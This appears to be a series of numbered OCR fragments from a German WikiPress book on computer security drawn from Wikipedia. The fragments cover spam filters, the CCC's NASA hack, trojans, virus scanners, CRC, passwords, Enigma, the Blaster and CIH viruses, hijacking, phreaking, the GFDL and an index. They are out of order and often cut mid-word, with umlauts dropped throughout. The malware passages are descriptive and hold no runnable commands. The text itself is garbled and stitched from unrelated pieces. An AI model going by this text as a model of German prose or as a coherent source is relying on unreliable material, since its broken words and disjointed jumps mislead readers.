Erkennung und Entfernung von Spam im Postfach Einige E Mail Clients Programme zum Schreiben Senden Empfangen einer E Mail wie der Mozilla Thunderbird haben integrierte auf dem Bayes schen Filter basierende selbstlernende Spamfilter die Werbemails von vornherein aussortieren Allerdings leiden die Filter unter ihren Fehlerraten So werden h u fig Spam Mails nicht zuverl ssig er
456. ragen Obwohl der CCC e V laut Satzung gemeinn tzig ist wurde die Gemeinn tzigkeit vom Finanzamt Hamburg nie anerkannt Der Verein soll seinen Mitgliedern behilflich sein bei Problemen aus gel st beispielsweise durch Netzwerkanalysen Er ist das finanzielle R ck grat f r die Datenschleuder und f r Projekte zur Erforschung von neuen Technologien Au erdem sind seine Sprecher als Sprachrohr der Hacker Szene aktiv NASA Hack An das von der NASA und ESA betriebene SPANet Space Physics Analysis Network waren weltweit etliche Gro rechner insbeson 160 Chaos Computer Club dere der Firma Digital angeschlossen Aufgrund einer Sicherheitsl cke im Betriebssystem VMS die 1986 in den USA behoben wurde aber erst Mitte 1987 in Europa gelang es norddeutschen Hackern Zugriff auf die Syste me und etliche Rechner in diesem Netzwerk zu erhalten Hierzu z hlten Maschinen der NASA der ESA Rechner der franz sischen Atomener giekommission Commissariat a l Energie Atomique Universit ten und Forschungseinrichtungen Nachweislich konnte jedoch nur Schaden auf Rechnern des als Hacker Fahrschule getauften CERN entdeckt werden von wo aus weitere Netze erreicht werden konnten Die norddeutschen Hacker wandten sich als es zu hei wurde an den CCC Dieser wiederrum kontaktierte im August 1987 das Bundesamt f r Verfassungsschutz das sich nicht zust ndig f hlte und von daher der Bit te Hinweise an die US amerikanischen Kollegen
457. rbeitet von den Hauptautoren Carter666 Devnull Kurt Jansson Achim Raschka Urbanus Nd Korre Steven Malkovich Jo i Stf Hansele Kaktus Diddi Dominik Nb MichaelDiederich Caramdir Zwobot anonym 12 1 06 1 2 06 WikiPress Redaktion Trojanisches Pferd Als Trojanisches Pferd bezeichnet man in der Computersprache schadi gende Programme die als n tzliche Programme getarnt sind oder zusam menh ngend mit einem n tzlichen Programm verbreitet werden aber tats chlich auf dem Computer im Verborgenen unerw nschte Aktionen ausf hren k nnen Umgangssprachlich werden Trojanische Pferde in Anlehnung an die griechische Mythologie auch Trojaner engl Trojan genannt Falsch ist dies deshalb weil die Trojaner eigentlich Opfer des Trojanischen Pferdes der Mythologie geworden sind und nicht dessen Urheber waren Aller dings ist der Ausdruck Trojaner mittlerweile derart verbreitet dass er weitgehend akzeptiert ist Ein Trojanisches Pferd z hlt zur Familie sch dlicher bzw unerw nsch ter Programme der so genannten Malware worin auch Computervi ren und Rootkits einzuordnen sind Die Grenze zwischen Backdoors 72 Trojanisches Pferd Rootkits und Trojanischen Pferden ist flie end umgangssprachlich wer den diese Begriffe h ufig synonym verwendet Charakteristika Trojanische Pferde sind Schad Programme Malware die auf fremde Com puter eingeschleust werden k nnen um unentdeckt Aktionen auszuf hren
458. rchsuchen Sonstige Scanner Neben dem Echtzeit und dem manuellen Scanner gibt es noch eine Reihe weiterer Scanner Die meisten davon arbeiten in dem sie den Netzwerkverkehr analysieren Dazu scannen sie in Echtzeit den Datenstrom und f hren bei einer Auff lligkeit eine entsprechende Operation aus wie etwa das Sperren des Datenverkehrs Eine andere L sung ist der Einsatz von Proxysoftware Manche Proxys er lauben das Anbinden von Antivirensoftware Wird eine Datei so herunterge laden wird diese zun chst am Proxy untersucht und gepr ft ob sie verseucht ist Je nach Ergebnis wird sie dann an den Client ausgeliefert oder gesperrt Erfolgswahrscheinlichkeit Aufgrund der st ndigen Weiterentwicklung von Malware Viren W r mer Trojaner etc und der Unvorhersehbarkeit der eingesetzten Schadlo 77 Software gik Evil Intelligence kann praktisch kein Virenscanner vor allen erdenk lichen Viren und W rmer sch tzen Scanengines Unter einer Scanengine versteht man den Programmteil eines Virenscanners der f r die Untersuchung eines Computers oder Netzwerkes auf schadhafte Software Malware verantwortlich ist Eine Scanengine ist somit unmittelbar f r die Effizienz von Antivirensoftware verantwortlich F r gew hnlich sind Scanengines Softwaremodule die unabh ngig vom Rest eines Virenscanners aktualisiert und eingesetzt werden k nnen Es gibt Antivirensoftware welche neben der eigenen Scanengine auch lizenzierte Scaneng
459. rde anders als zum Beispiel Telefon oder IRC nicht f r zeitgleiches synchrones Senden und Empfangen entwickelt sondern ist wie Briefpost oder Fax ein asynchrones Kommunikationsmedium der Sender kann seine Nachricht auch senden wenn der Empf nger sie nicht sofort entgegennehmen kann Die Laufzeit der E Mail kann ein Problem darstellen da sie anders als zum Beispiel beim Telefax nicht vorhersehbar ist und unter ung nstigen 186 E Mail berwachung Voraussetzungen stark schwanken kann Die Schwankungen der Laufzeit werden durch eine Vielzahl von Parametern beeinflusst vor allem durch die Auslastung der beteiligten Mailsysteme sowie der f r E Mail bereit stehenden bertragungskapazit t der die Mailsysteme verbindenen Lei tungen Ist der Mailserver des Empf ngers l nger nicht erreichbar oder die Mail wird nur in gro en Zeitabst nden auf den Server des Empf ngers bertragen kann es durchaus zu Laufzeiten von einigen Tagen kommen Absenderauthentifizierung Im Jahre 2004 gab es verschiedene Versu che das Spam Problem in den Griff zu bekommen Dabei konkurrierten die Verfahren Sender ID von Microsoft Sender Policy Framework SPF DomainKeys von Yahoo RMX und AMTP um die Gunst der Umsetzung Eine IETF Arbeitsgruppe versuchte einen Standard zu definieren Die Funktionsweise ist bei allen Verfahren hnlich Durch einen Zusatzein trag im DNS sollte es m glich sein den sendenden Mailserver zu verfizie ren Die IETF
460. rechnung nach H ufigkeit Dauer oder Umfang der Nutzung Damit wird einerseits die unbegrenzte Nutzung einschr nkbar andererseits werden On Demand Gesch ftsmodelle erm glicht die vorher kaum zu realisieren waren Beispiele f r DRM Systeme Enterprise Rights Management Systeme CoreMedia DRM 3 0 Microsoft Rights Management Server Adobe Lifecycle Policy Server Authentica Active Rights Management Multimedia Rights Management Systeme Real Media Helix FairPlay Apple iTunes F r 3D Darstellungen Navisware FileLine Mobile Endger te OMA DRM 1 0 und 2 0 Spezifikationen f r mobile Endger te teils ge eignet f r alle IT Plattformen implementiert in zahlreichen Handys Hintergrund Im Gegensatz zu traditionellen Informationstr gern wie B chern oder Schallplatten lassen sich Computerdateien und andere digitale Medi 128 Digital Rights Management en CD DVD ohne Qualit tsverlust und nennenswerte Kosten beliebig kopieren Zu einem ernsten Problem f r die Musikindustrie wurde das erstmals Mitte der 1990er Jahre als CD Brenner f r Endverbraucher er schwinglich wurden Ende der 1990er Jahre erfuhren au erdem die so genannten Internet Tauschb rsen immer st rkeren Zulauf da Internet Benutzer dort kostenlos Dateien von der Festplatte anderer Benutzer ko pieren k nnen Meist handelt es sich dabei um urheberrechtlich gesch tz te Musik Filme oder Software Um das zu verhindern versehen manche Plattenfirmen ihre C
461. register Schieberegister linksschieben um rechtes Bit 0 Schieberegister enth lt das Ergebnis Durch Verwendung einer Tabelle die etwa bei einer CRC 8 f r jedes der 256 m glichen Bytes den zugeh rigen CRC Wert enth lt l sst sich obiger Algorithmus auf das Achtfache beschleunigen Die Operationen Linksschieben und Exklusiv Oder machen die CRC hervorragend geeignet zur Verwendung in Logikschaltungen Die CRC eines Datenstroms kann bitweise oder auch Byte weise usf berechnet und vom Sender an die Daten angeh ngt werden Der Empf nger des Da tenstroms kann den CRC genauso wie der Sender berechnen jedoch unter Einbeziehung des CRC Das Ergebnis inklusive des CRC muss dann gleich Null sein sonst enth lt der Strom Bitfehler CRC Typen werden oft anhand des als Divisor verwendeten Polynoms unterschieden im Hexadezimal Format Eines der meistverwendeten CRCs u a von Ethernet FDDI ZIP und PNG benutzt ist das Polynom 0x04C11DB7 bekannt als CRC 32 Es stellte sich heraus dass einige Poly nome besser sch tzen als andere F r CRC h ufig verwendete Polynome sind das Ergebnis umfangreicher mathematischer und empirischer Ana lysen und keine Zufallszahlen auch wenn sie so aussehen 262 Zyklische Redundanzpr fung Andere Startwerte Die Implementierung f hrt eine Polynomdivision aus wenn als Startwert 0000 verwendet wird Oft findet man andere Startwerte etwa 1111 Dies entspricht einer Polynomdivision wenn
462. ren so genannter Hash Funktionen trotzdem pro blemlos erfolgen Das Kennwort sollte m glichst lang sein Das System sollte einen m g lichst gro en Zeichensatz verwenden mit dem das Kennwort gebildet wird Die optimale L nge und Zusammensetzung h ngt von mehreren Faktoren ab welche Zeichen verwendet werden Zahlen Buchstaben Sonderzei chen geordnet nach Komplexit t da Zahlen nur zehn Variationen von 0 9 Buchstaben hingegen 26 oder mit Gro Kleinschreibung sogar 52 Variationen pro Zeichen zulassen welche einen Brute Force Angriff auf das Kennwort deutlich erschweren Sonderzei chen bieten die gr te Variationsdichte sind allgemein aber schwe rer einzupr gen Man sollte ein Mittelma zwischen Sicherheit und Einpr gsamkeit finden wie schnell der Zugriff auf das Kennwort ist z B Webserver Zu griff ist generell langsamer als direkter Dateizugriff auf den Hash des Kennwortes selbst ob das Kennwort mittels eines W rterbuchangriffs gefunden wer den kann Dies kann durch Kunstw rter ohne logischen Bezug wie z B Pfeifenleuchte oder Vogeltastatur verhindert werden da W rterbuchangriffe auf Listen bekannter Kennw rter und Begriffe zugreifen Allerdings k nnten komplexere W rterbuchangriffe mit Hybrid Funktion mehrere W rterreihen kombinieren und so auch Kunstw rter brechen Doch solch ein komplexer Angriff h ngt sei nerseits mit sehr vielen Parametern und Kombinationsm glichkei ten zusammen so d
463. replay Tomte Tonk Toppe Tormen TorPedo TorsTen TorstenHendrich Toutiorix Trainspotter Transmission Traroth Trias2k2 Triebt ter Triton Trixium Troels Nybo Trugbild Tsca bot Tsor Tsukasa Turbobernd TUV Verlag Tux edo Typohunter Tzzzpfff Udm Uebs Ufobat Ukadow Ulf Wetzker Uli g Ulrich fuchs Umaluagr UncleOwen Unriddler Un scheinbar Unukorno Urbanus Urizen Urs UsagiYojimbo Uwe Eggert Uwe Gille Uwe Hermann Uweschwoebel VanGore Vanis Vejoun Velten Verdi VerwaisterArtikel Verw stung Victor H Viki Vinci ViperbOy Virtualone Vlado Vocat Volker Hehl Volty Vulture Vux W ewert Waelder Waldgeist Walter Koch Warp Warum Wasseralm Weede Weialawaga Wei Nix Werl000 Wer nerH Wernfried Weyf Wgd WHS Widewitt Wiegand Wiegels Wiener WiESi Wikibar Wiki Care Wikifh Wiki Hypo WikiMax Wikimensch Wikinator Wikipediaphil Wikizen Wiknick Wimmerm Winne Wittkowsky WKr Wolfgang1018 W lkchen Wolle1024 Wolley Wst Wst wiki Wuffel Wuffff Xell Xeper Xorx77 XRay XTaran Xzaranos Yankee51 Yas Yath Yolgie Youssef san Yurik YurikBot Zahnstein Zakysant Zaphiro Zaungast Zaxxon Zbik Zebbo Zenogantner Zinnmann Zoebby Zook Zoph Zotti Zumbo Zwobot zzz 326 GNU Free Documentation License Version 1 2 November 2002 Copyright C 2000 2001 2002 Free Software Foundation Inc 59 Temple Place Suite 330 Boston MA 02111 1307 USA Everyone is permitted to c
464. rfahren und hat au erdem den gro en 7 PR 1984 Chor Rivest Vorteil in beiden Richtungen eingesetzt werden 79g5 zu k nnen Elgamal Anwendung Asymmetrische Kryptosysteme werden zur Verschl sselung Authentifi zierung und Sicherung der Integrit t eingesetzt Dies geschieht heutzutage z B beim E Mail Verkehr OpenPGP S MIME ebenso wie bei krypto grafischen Protokollen wie SSH Damit k nnen sie ebenfalls zur sicheren Abwicklung von Gesch ften im Internet eingesetzt werden wo sie die Identit t der Vertragspartner best tigen diese authentifizieren und die Unver nderbarkeit der ausge tauschten Daten sicherstellen sollen Elektronische Signatur Dazu ist eine Infrastruktur notwendig die die G ltigkeit der Schl ssel durch Zer tifikate best tigt F r diese Aufgabe gibt es sog Trustcenter Dabei wer den je nach Klasse der Zertifikate pers nliche Daten erfasst Bewertung Vorteile Asymmetrische Kryptosysteme haben den Vorteil dass sie das Geheimnis m glichst klein halten da jeder Benutzer nur seinen eigenen privaten Schl ssel geheim halten muss Im Gegensatz dazu muss bei ei nem symmetrischen Kryptosystem jeder Benutzer alle Schl ssel geheim halten was mit einem steigenden Aufwand geschehen muss je mehr Teil nehmer daran beteiligt sind gro e Zahl an Schl sseln Als weiterer Punkt vermindert sich das so genannte Schl sselver teilungsproblem Bei einem symmetrischen Kryptosystem m ssen die Schl
465. rfreak welcher im Gegensatz zu einem Ha cker seine F higkeiten destruktiv einsetzt wird unter den Hackern als Crasher und seit Anfang der 1990er allgemein auch als Cracker charak terisiert Zu seinen Handlungen geh rt das Lahmlegen von Computer und Telefonnetzen genauso wie das in krimineller Absicht vollzogene Ein dringen in fremde Computersysteme Das schlie t die bernahme der Kontrolle ber das fremde System ebenso mit ein wie das Belegen von fremden Speicherressourcen und den Diebstahl von Rechenleistung f r eigene Zwecke Der Diebstahl die Manipulation oder Zerst rung von Daten sowie das Terrorisieren seiner Mitmenschen durch absichtlich 172 Cracker herbeigef hrte Abst rze der Rechner z hlen ebenfalls zu seinen Hand lungen Angesichts des rasanten technischen Fortschritts den zahlreichen leichtverst ndlich aufbereiteten Hackeranleitungen und des gro en Pools an vorgefertigten stark automatisierten Angriffswerkzeugen gibt es ver mehrt auch destruktive Skriptkiddies die von ihrer Handlungsweise stark mit dem Cracker assoziiert werden Da ein Skriptkiddie anders als ein Cracker mit geringen Computerkenntnissen agiert und nichts von der Sicherheitsl cke versteht kann es Sicherheitsbarrieren ausschlie lich mit hilfe vorgefertigter Programme berwinden Zudem ben tigt es dazu ein Skript also eine Schritt f r Schritt Bedienungsanleitung oder zumindest einen stark vereinfachenden Automatismus um ein solches
466. rich Enigma Eins die ab 1930 von der Reichswehr und sp ter von der Wehrmacht eingesetzt wurde und w hrend des Zweiten Weltkriegs das wohl am h ufigsten benutzte Schl sselverfahren verk rpert Die bea Enigma I sieht auf den ersten Blick _ aus wie eine Schreibmaschine Sie Abb 33 Die deutsche Schl sselmaschine Enigma besteht im Wesentlichen aus der Tastatur einem Walzensatz von drei austauschbaren Walzen Ro toren sowie einem Lampenfeld zur Anzeige Der Walzensatz ist das Herzst ck zur Verschliisse lung Die drei Walzen sind drehbar angeordnet und weisen auf beiden Seiten jeweils 26 elektrische Kon takte auf je einen f r jeden der gt 26 Buchstaben des Alphabets Abb 34 Der Walzensatz aus drei rotierenden die durch 26 Dr hte im Inneren Walzen und der Umkehrwalze B links der Walze auf streng geheime Weise paarweise miteinander verbunden sind Beispielsweise Kontakt A mit B B mit D und so weiter Dr ckt man eine Buchstabentaste so flie t elektrischer Strom von einer in der Enigma befindlichen Batterie ber die gedr ckte Taste durch den Wal zensatz und l sst eine Anzeigelampe aufleuchten Der angezeigte Buch stabe bildet die Verschl sselung des gedr ckten Buchstabens Da sich bei jedem Tastendruck die Walzen hnlich wie bei einem mechanischen Kilometerz hler weiterdrehen ndert sich die Verschl sselung nach je dem Buchstaben 296 Enigma Gibt man OTTO ein so leuchten nacheinan
467. rich WikiPress 7 Originalausgabe Ver ffentlicht in der Zenodot Verlagsgesellschaft mbH Berlin M rz 2006 Die Artikel und Bilder dieses Bandes stammen aus der Wikipedia http de wikipedia org Stand 12 Januar 2006 und stehen unter der GNU Lizenz f r freie Dokumentation Sie wurden vom WikiPress Redaktionsteam f r den Druck aufbereitet und modifiziert Sie d rfen diese modifizierte Ver sion unter den Bedingungen der Lizenz benutzen Eine transparente elek tronische Kopie finden Sie unter http www wikipress de baende compu tersicherheit xml Die detaillierte Versionsgeschichte Historie eines jeden Artikels finden Sie unter der jeweils angegebenen Quelle durch einen Klick auf Versionen Autoren oder in gesammelter Form f r dieses Buch unter http www wikipress de baende computersicherheit_historien txt Die zu sammengefasste Versionsgeschichte finden Sie unter jedem Artikel Copyright c 2006 Zenodot Verlagsgesellschaft mbH Berlin Permission is granted to copy distribute and or modify this document under the terms of the GNU Free Documentation License Version 1 2 or any later version published by the Free Software Foundation with no Invariant Sections no Front Cover Texts and no Back Cover Texts A copy of the license is included in the section entitled GNU Free Docu mentation License Das Logo der Wikipedia ist durch die Wikimedia Foundation Inc urheber und markenrechtlich gesch tzt Umschlagfotos Gr
468. rmittelt werden der zum Verschl sseln von Nachrichten diente und von den Deutschen t glich um 0 Uhr gewechselt wurde 1939 verbesserten die Deutschen die Handhabung der Enigma Es wurden f nf statt drei Walzen verwendet wobei jedoch nur jeweils drei Walzen in der Maschine eingesetzt wa ren und mit Hilfe eines Steckbretts 10 statt bisher 4 Buchstabenpaare vertauscht Der dadurch weiter angewachsene Schl sselraum konnte nur durch den Bau von 60 weiteren Bomben bew ltigt werden Zwei Wochen vor dem deutschen Angriff auf Polen konnten das Wissen um die kryptografischen Schwachstellen ein Konstruktionsplan der Bomben und zwei Kopien der Enigma nach Frankreich und Gro britannien geschmuggelt werden Die Erkenntnisse des Biuro Szyfr w gt http pl wikipedia org wiki Biuro_Szyfr w wurden von den Alliier ten vor allem in Gro britannien weiter genutzt und verbessert Dies ist einem Deutschen zu verdanken der eine Funkerstelle beim Milit r in nehatte und sich f r seine Entlassung nach dem Ersten Weltkrieg an den Deutschen r chen wollte Er nahm Kontakt mit dem franz sischem Ge heimdienst auf und traf sich insgesamt dreimal mit einem Agenten mit dem Decknamen Rex Er selbst erhielt als Deckname die zwei Buchsta ben AH Er lieferte den Franzosen Baupl ne der Enigma aber seine Pl ne enthielten nicht die Verdrahtung Er wurde 1943 vom franz sischen Ge heimdienst verraten und noch im selben Jahr hingerichtet 1999 wurde be kan
469. rranties any other implication that these Warranty Disclaimers may have is void and has no effect on the meaning of this License 2 VERBATIM COPYING You may copy and distribute the Document in any medium either commercially or noncommercially provided that this License the copyright notices and the license notice saying this License applies to the Document are reproduced in all copies and that you add no other conditions whatsoever to those of this License You may not use technical measures to obstruct or control the reading or further copying of the copies you make or distribute However you may accept compensation in exchange for copies If you distribute a large enough number of copies you must also follow the conditions in section 3 You may also lend copies under the same conditions stated above and you may publicly display copies 3 COPYING IN QUANTITY Ifyou publish printed copies or copies in media that commonly have printed covers of the Document numbering more than 100 and the Document s license notice requires Cover Texts you must enclose the copies in covers that carry clearly and legibly all these Cover Texts Front Cover Texts on the front cover and Back Cover Texts on the back cover Both covers must also clearly and legibly identify you as the publisher of these copies The front cover must present the full title with all words of the title equally prominent and visible You may add other material on the covers in a
470. rschutz 120 129 171 Kryptoanalyse 268 271 272 281 286 292 293 309 317 Kryptografie 90 129 140 258 267 271 272 281 Kryptologie 136 140 267 271 272 286 311 L Lightweight Directory Access Protocol 141 Linkvirus 30 46 Linux 24 58 61 80 85 89 105 257 Local Area Network 23 94 183 227 254 256 Logfile 97 163 190 Loveletter 60 62 169 M MAC Adresse 244 253 MacOSX 24 104 105 Mail Transfer Agent 194 206 Makro 23 47 Makrovirus 47 51 Malware 21 22 60 61 72 73 75 78 96 100 124 Man In The Middle Angriff 213 227 279 280 322 Manipulation 47 123 195 Master Boot Record 29 45 48 MD5 259 321 Medosch Armin 181 Merkle Ralph 278 Microsoft 12 13 26 59 60 61 65 66 67 68 70 98 109 113 114 116 122 124 129 187 210 223 254 319 Microsoft Windows 23 43 49 51 53 56 61 65 68 70 73 80 89 102 103 108 113 114 170 223 257 277 MIRC 54 60 63 Mitnick Kevin 180 229 Morris Robert Tappan 40 60 180 Mozilla 26 126 133 148 165 233 MP3 56 129 MS RPC 91 MTE 41 Miiller Klaus Rainer 14 M ller Maguhn Andy 162 Multipurpose Internet Mail Extensions 184 188 Mydoom 61 65 69 210 MySQL 218 N Napster 129 National Center for Supercomputing Applications 318 Netsky 59 69 Network Address Translation 91 93 Network News Transfer Protocol 322 Netzwerkprotokoll 60 95 239 257 Netzwerksicherheit 87 Neumann John von 4
471. rt werden Seine Tarnung als regul re Applikation legt aber eher eine Kategorisierung als Trojaner nahe Die Meldungen von neuen Handyviren bzw Trojanern rei en nicht ab So meldete F Secure nach dem Auftauchen von Cabir den Handywurm Mabir a und auch Fontal A hat es in die Virenlisten der Anti Virenher steller geschafft W hrend Mabir automatisch alle eingehenden MMS mit einer Kopie von sich selbst beantwortet und versucht sich an in der N he befindliche Bluetooth Ger te zu versenden probiert Fontal via Peer to Peer Plattformen auf das Handy zu gelangen und macht dieses nach dem n chsten Neustart unbrauchbar Quelle http de wikipedia org wiki Handyvirus Historie 10 3 04 Anonym angelegt danach bearbeitet von den Hauptautoren Miccom Stf Mikue Steven Malkovich MichaelDiederich 1 1111 anonym 12 1 06 1 2 06 WikiPress Redaktion CIH Virus CIH auch bekannt als Chernobyl oder Spacefiller ist ein Computervirus Er wurde vom Taiwaner Chen Ing Hau geschrieben CIH ist ein Compu tervirus der auch Hardware Defekte verursachen kann Er bef llt Portab le Executable exe Dateien unter Windows 95 Windows 98 und Windows ME Auf Windows NT basierende Windows Versionen sind nicht betrof fen was dem Virus heute mehr und mehr an Bedeutung nimmt Die Schadensroutine aktiviert sich am 26 April dem Geburtstag des Autors sowie dem Tag der Reaktorkatastrophe in Tschernobyl 1986 Da bei wird zuerst der komplette Inhalt der Festplat
472. ry an den folgenden Schl sseln erkannt werden HKEY OCAL _MACHINE SOFTWARE Microsoft Windows CurrentVersion Run windows auto update msblast exe HKEY LOCAL _ MACHINE SOFTWARE Microsoft Windows CurrentVersion Run windows auto update msblast exe I just want to say LOVE YOU SAN bill Bei den Varianten B und C des Virus finden sich hier statt msblast exe die Dateien penis exe oder teekids exe sowie ein etwas anderer Text 71 Viren W rmer Trojaner W32 Blaster macht sich auch durch Abst rze des Rechners bemerkbar die von der Meldung Windows muss jetzt neu gestartet werden da der Dienst Remoteprozedurablauf unerwartet beendet wurde begleitet wer den Funktionsweise Der Angreifer l sst einen TFTP Server laufen um den Wurm einzu schleusen Eine Verbindung zwischen dem Angreifer und seinem Opfer wird auf dem TCP Port 135 hergestellt Eine Shell wird auf dem Opfer hergestellt welche auf den TCP Port 4444 lauscht Der Angreifer f hrt einen Befehl ber die Shell aus um das Opfer zu veranlassen den Wurm zu installieren Der Angreifer beendet die Verbindung zur Shell des Opfers anschlie end stoppt die Shell das Lauschen auf dem TCP Port 4444 des Opfers Das Opfer startet einen TFTP Server und Prozesse anderer Anweisun gen z B zur nderung der Registrierungsschl ssel etc Quelle http de wikipedia org wiki W32 Blaster Historie 12 8 03 Angelegt von Carter666 danach bea
473. s Ent schliisseln einer Nachricht Daher musste der Schliissel zwischen den Kommunikationspartnern ber einen sicheren Weg ausgetauscht werden wie beispielsweise einem vertrauensw rdigen Kurier oder dem direkten Treffen der Kommunikationspartner Diese Situation wurde schnell un berschaubar wenn die Anzahl der beteiligten Personen anstieg Auch wurde ein jeweils neuer Schl ssel f r jeden Kommunikationspartner be n tigt wenn die anderen Teilnehmer nicht in der Lage sein sollten die Nachrichten zu entschl sseln Dieses System wird als Private Key Krypto grafie oder Shared Secret bezeichnet Bei der Public Key Kryptografie wird ein Paar zusammenpassender Schl ssel eingesetzt Der eine ist ein ffentlicher Schl ssel der zum Ver schl sseln benutzt wird Der andere ist ein privater Schl ssel der geheim gehalten werden muss und zur Entschl sselung eingesetzt wird Ein sol ches System wird als asymmetrisch bezeichnet Mit dieser Methode wird nur ein einziges Schl sselpaar f r jeden Empf nger ben tigt da der Besitz des ffentlichen Schl ssels die Sicherheit des privaten Schl ssels nicht aufs Spiel setzt Im Allgemeinen ist ein solches System nicht umkehrbar d h eine Nachricht welche mit dem privaten Schl ssel verschl sselt wurde kann nicht mit dem ffentlichen Schl ssel entschl sselt werden Aller dings gilt dies nicht f r RSA Wie es bei heimlichen Techniken fter der Fall ist wurde auch die Pu blic Key Krypt
474. s keine zentrale Zerti fizierungs Instanz gibt sondern so genannte Ketten des Vertrauens Geschichte Phil Zimmermann schrieb die erste Version 1991 Sein Ziel war es dass andere Atomkraftgegner sicher Nachrichten und Daten speichern konn ten Schon von der ersten Stunde an war PGP Open Source und konnte aus dem Usenet heruntergeladen werden PGP durfte in seinen Anfangsjahren nicht aus den USA exportiert wer den da es unter das US Waffengesetz fiel Danach unterliegen Kryptosys teme mit Schl sseln von mehr als 40 Bit L nge den Exportbestimmungen PGP lag mit 128 Bit weitaus h her Durch die Verbreitung im Internet wurde Phil Zimmermann Ziel von Untersuchungen wegen unerlaubter Waffenexporte Mitte der 1990er Jahre liberalisierten die USA diese Ge setze Um die Exportbeschr nkung zu umgehen wurde die Version 5 als Quellcode in Form eines Buches aus den USA legal exportiert und von ber 60 Freiwilligen per Hand eingescannt Aus dem gescannten Pro grammcode wurde dann eine international verf gbare Version von PGP PGPi kompiliert Die Firma PGP Corporation stellte bis Version 8 mit PGP Freeware ein eigenst ndiges Produkt f r nicht kommerzielle Nutzer bereit Seit Version 9 gibt es stattdessen nur noch die Testversion von PGP Desktop Professional 9 F r 30 Tage kann sie uneingeschr nkt genutzt werden 135 PGP und Zertfikate Nach Ablauf der Frist werden Funktionsumfang und Nutzungsrechte auf einen Umfang reduziert der etw
475. s werden dabei z B daf r verwen 165 Sonstige Themen det Benutzerprofile ber das Surfverhalten zu erstellen Ein Online Shop kann z B diese Daten mit dem Namen des Kunden verkn pfen wenn man Kunde bei ihm ist und zielgruppenorientierte Werbemails schicken Ein Cookie kann jedoch nur Informationen enthalten die der Website Anbieter selbst an den Benutzer sendet private Daten des Benutzers las sen sich damit nicht auslesen Marketingfirmen die bei vielen Websites Werbebanner haben k nnen mit so genannten serverfremden Cookies sogar ber einzelne Websites hinweg den Benutzer verfolgen Erlauben oder Sperren Ein Kompromiss zwischen den Vor und Nachteilen von Cookies kann erzielt werden indem man seinen Browser so konfiguriert dass per sistente Cookies nicht oder nur gegen R ckfrage zugelassen werden was z B die Erstellung von Benutzerprofilen erschwert und Session Cookies automatisch zugelassen werden z B f r Webeink ufe Pass w rter Au erdem bieten die meisten Browser die M glichkeit Cookies selektiv f r bestimmte Dom nen zu erlauben bzw zu sperren oder nach dem Surfen automatisch zu l schen wie es automatisch bei Session Cookies geschieht Auch ist es m glich serverfremde Cookies automa tisch abzuweisen ber die ein Dritter etwa ein Werbepartner der Inter net Seite das eigene Verhalten ber mehrere Server hinweg aufzeichnen k nnte Aufbau Ein Cookie besteht aus einem Namen und einem
476. seiner Gesch fte zu hindern So k nnen Empf nger von UCE z B zum Schein mit falschen pers nlichen Daten auf die angebotenen Gesch fte eingehen Dies bewirkt beim H nd ler dem der T ter zuarbeitet eine Flut von Fehlern bei Bestellungen von Kunden die vom T ter angeworben wurden Das f hrt m glicherweise sogar zur Beendigung des Gesch ftsverh ltnisses Dieses Vorgehen l sst sich automatisieren beispielsweise mit Proxys ist rechtlich aber h chst fraglich 202 Spam Absender von Nigeria Connection Mails kann man einfach durch Ant worten und das F hren zielloser Diskussionen besch ftigen Dies bindet beim T ter Zeit Pers nliche Daten oder gar Bankverbindung sollte man dabei nat rlich nicht preisgeben Rechtslage Rechtslage in Deutschland Eine Haftungsfrage f r den Versand von E Mail W rmern und Trojanern die den gr ten Anteil an der UBE nach UCE ausmachen d rften ist in Deutschland noch umstritten Unter sehr eingeschr nkten Bedingungen sehen einige Autoren zumindest Unter nehmen als haftbar an f r Privatpersonen verneint die Literatur ber wiegend eine Haftungsverpflichtung Ein Unterlassungsanspruch gegen versehentliche Wurmversender wurde bislang noch nicht durchgesetzt Strafrechtlich ist das Erstellen und Verbreiten von W rmern Viren und Trojanern als Computersabotage relevant 2005 wurde in Deutschland deswegen ein Sch ler als Autor von Netsky und Sasser zu einem Jahr und neun Monaten Haft auf
477. seite verwendet werden Browser Hijacking nderung der Startseite bzw der Suchseite eines Browsers auf eine vom Benutzer nicht gew nschte Seite durch ein b s artiges Programm Suchmaschinen Hijacking Das Linken auf eine URL ber Header anweisungen des HTTP Headers Es wird dabei nicht normal sondern dynamisch auf Seiten verlinkt Der Code 302 signalisiert dem Browser 212 Phreaking dass die Inhalte an eine andere URL verschoben wurden Dies f hrte aber durch einen Bug in der Suchmaschine von Google dazu dass die verlinkten Seiten aus dem Index entfernt wurden TCP Hijacking Erfolgreiche bernahme bzw Unterbrechung ei ner TCP Verbindung durch das Erraten der auf eine Sequenznumber folgenden Acknowledgmentnumber Oftmals werden zugleich Spoo fing Techniken eingesetzt um die Verbindung zu bernehmen Der Absender wird dabei auf ein falsches Ziel umglenkt oder zwar auf das eigentliche Ziel jedoch ber den Rechner des Angreifers als Zwischen h ndler der Verbindung Man In The Middle Angriff Quelle http de wikipedia org wiki Hijacking Historie 15 7 04 Angelegt von Finanzer danach bearbeitet von den Hauptautoren Finanzer Neo23x0 Amogorkon Stern Fomafix Adomnan MichaelDiederich anonym 12 1 06 1 2 06 WikiPress Redaktion Phreaking Phreaking bezeichnet das in der Regel illegale Manipulieren von Telefon systemen Dabei geht es normalerweise um die kos tenlose Benutzung analoger Systeme von Tele fonz
478. selten Nachrich ten von h heren deutschen Stellen genutzt wurden ist nicht bekannt Im Kampf gegen Japan benutzten die Amerikaner einen Code der auf der Sprache amerikanischer Ureinwohner n mlich der Indianer vom 317 Kryptografie Stamm der Navajos basierte Dieser Code wurde nie geknackt Der ame rikanische Spielfilm Windtalkers aus dem Jahre 2002 mit Nicolas Cage bezieht sich auf diese Ereignisse Literatur Bauer Friedrich L Entzifferte Geheimnisse Methoden und Maximen der Kryptographie 3 Auflage Springer Berlin 2000 ISBN 3 540 67931 6 Harris Robert Enigma Fiktion Heyne 1996 ISBN 3 453 11593 7 Kozaczuk Wladyslaw Geheimoperation Wi cher Karl M ller Verlag K ln 1989 Kruh Louis Deavours Cipher The commercial Enigma Beginnings of machine cryptography In Cryptologia Nr 1 vol XXVI Januar 2002 Schmeh Klaus Die Welt der geheimen Zeichen W3L Verlag Bochum 2004 ISBN 3 937 13790 4 Singh Simon Geheime Botschaften dtv 2001 ISBN 3 423 33071 6 Welchman Gordon The Hut Six Story Breaking the Enigma Codes M amp M Baldwin Cleobury Mortimer 2000 ISBN 0 947712 34 8 Quelle http de wikipedia org wiki Enigma_ Maschine Historie 15 2 02 Angelegt von 